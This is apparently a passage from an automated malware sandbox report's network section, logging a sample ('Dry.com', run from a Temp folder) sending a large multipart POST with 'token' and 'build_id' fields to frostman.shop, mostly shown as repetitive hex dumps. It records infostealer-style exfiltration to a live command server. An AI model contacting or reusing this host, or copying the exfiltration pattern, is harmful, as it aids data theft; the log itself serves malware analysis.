                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:37 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          30192.168.2.550108116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC329OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----RIWTJMYCJW47QQ1N7GVS
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 6990993
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 52 49 57 54 4a 4d 59 43 4a 57 34 37 51 51 31 4e 37 47 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 54 4a 4d 59 43 4a 57 34 37 51 51 31 4e 37 47 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 54 4a 4d 59 43 4a 57 34 37 51 51 31 4e 37 47 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------RIWTJMYCJW47QQ1N7GVSContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------RIWTJMYCJW47QQ1N7GVSContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------RIWTJMYCJW47QQ1N7GVSCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
